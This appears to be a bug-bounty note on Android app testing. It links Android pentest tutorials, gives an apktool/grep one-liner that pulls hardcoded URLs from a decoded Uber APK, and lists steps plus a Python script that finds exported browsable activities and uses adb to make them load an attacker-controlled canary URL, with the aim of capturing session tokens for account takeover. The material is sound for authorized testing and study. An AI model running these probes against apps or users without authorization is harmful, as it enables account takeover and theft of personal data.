- https://www.hackingarticles.in/android-penetration-testing-apk-reverse-engineering/
- https://www.hackingarticles.in/android-penetration-testing-apk-reversing-part-2/
- https://www.hackingarticles.in/android-pentest-deep-link-exploitation/
- https://www.hackingarticles.in/android-penetration-testing-webview-attacks/
- https://www.hackingarticles.in/android-penetration-testing-frida/
- https://www.hackingarticles.in/android-pentest-lab-setup-adb-command-cheatsheet/
- https://www.hackingarticles.in/android-hooking-and-sslpinning-using-objection-framework/
- https://www.hackingarticles.in/android-penetration-testing-drozer/
- https://www.hackingarticles.in/android-pentest-automated-analysis-using-mobsf/
Pull every hardcoded URL out of a decoded APK (apktool uses `d` for decode; `anew` is tomnomnom's dedup tool, the trailing grep drops the usual framework noise):

apktool d com.uber.apk -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
- Download jadx decompiler and install adb
- Open AndroidManifest.xml
- Find all browser activities: every activity or activity-alias whose intent-filter contains the action "android.intent.action.VIEW" and the category "android.intent.category.BROWSABLE" (a component with an intent-filter is exported by default unless it sets android:exported="false")
- Run "adb shell am start -n app_package_name/component_name -a android.intent.action.VIEW -d http://google.com" for each of the activities (or any of your domains). Also track in Burp any requests to http://google.com or your domain
- If your domain gets opened, the activity loads an attacker-supplied URL: that is the vulnerability. Now inspect the request in Burp for auth material (session cookies, Authorization headers, tokens in the query string); if it carries any, you have an account takeover. If not, try other techniques to leak PII through the WebView. In the worst case the payout is comparable to an XSS
- This only applies if the app really opens arbitrary links (the activity loads whatever URL it is handed). Use http://google.com or, better, a domain you control in step 4 so the request shows up in your logs or Burp
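Steps 2 to 4 above can be scripted. The following is an added example, not code from the linked articles: it parses a decoded AndroidManifest.xml (as produced by apktool or jadx), lists every activity or activity-alias with a VIEW + BROWSABLE intent-filter that is not explicitly unexported, and emits one explicit-intent `adb shell am start` per component pointing at a canary URL. The manifest embedded below is constructed for the demo and `http://canary.example/x` stands in for your own listener domain; swap in the real manifest path and domain when running it.

```python
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ACTION_VIEW = "android.intent.action.VIEW"
CAT_BROWSABLE = "android.intent.category.BROWSABLE"

# Constructed sample manifest (not from any real app) covering the cases that matter:
# a launcher activity (ignored), a browsable WebView activity (target), a browsable
# activity explicitly marked exported="false" (adb shell gets a Permission Denial
# starting it, so it is skipped) and a browsable activity-alias (target).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name="com.example.app.WebViewActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="example.com"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalWebActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="myapp"/>
      </intent-filter>
    </activity>
    <activity-alias android:name=".LinkAlias" android:targetActivity=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="http"/>
      </intent-filter>
    </activity-alias>
  </application>
</manifest>
"""


def _a(elem, name):
    """Read an android:-namespaced attribute such as android:name."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def qualify(package, name):
    """Expand the ".Foo" shorthand used in manifests to package.Foo."""
    return package + name if name.startswith(".") else name


def browsable_components(manifest_xml):
    """Return (package, [component names]) for each activity / activity-alias that
    has a VIEW + BROWSABLE intent-filter and is not explicitly unexported (step 3)."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    found = []
    for tag in ("activity", "activity-alias"):
        for comp in root.iter(tag):
            # A component that declares an intent-filter is exported unless it opts out.
            if _a(comp, "exported") == "false":
                continue
            for filt in comp.findall("intent-filter"):
                actions = {_a(x, "name") for x in filt.findall("action")}
                cats = {_a(x, "name") for x in filt.findall("category")}
                if ACTION_VIEW in actions and CAT_BROWSABLE in cats:
                    found.append(qualify(package, _a(comp, "name")))
                    break
    return package, found


def adb_commands(manifest_xml, url):
    """One explicit-intent 'am start' per browsable component (step 4). Because -n
    names the component, the <data> filter is never consulted: the activity receives
    our URL even though its filter only declares its own scheme/host."""
    package, comps = browsable_components(manifest_xml)
    return [
        ["adb", "shell", "am", "start", "-n", "%s/%s" % (package, comp),
         "-a", ACTION_VIEW, "-d", url]
        for comp in comps
    ]


def main(argv):
    """usage: deeplink_probe.py AndroidManifest.xml http://your-canary-domain/ [--run]"""
    if len(argv) < 3:
        print(main.__doc__)
        return 2
    with open(argv[1]) as fh:
        manifest = fh.read()
    for cmd in adb_commands(manifest, argv[2]):
        print(shlex.join(cmd))  # dry run: show what will be fired
        if "--run" in argv[3:]:
            subprocess.run(cmd, check=False)  # needs adb and a connected device
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it without `--run` first to review the component list, then with `--run` while Burp (or your canary domain's logs) is watching; any hit from a component on that list is the finding described in step 5, and the request headers are where the auth tokens would show up.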
Android Reverse Engineering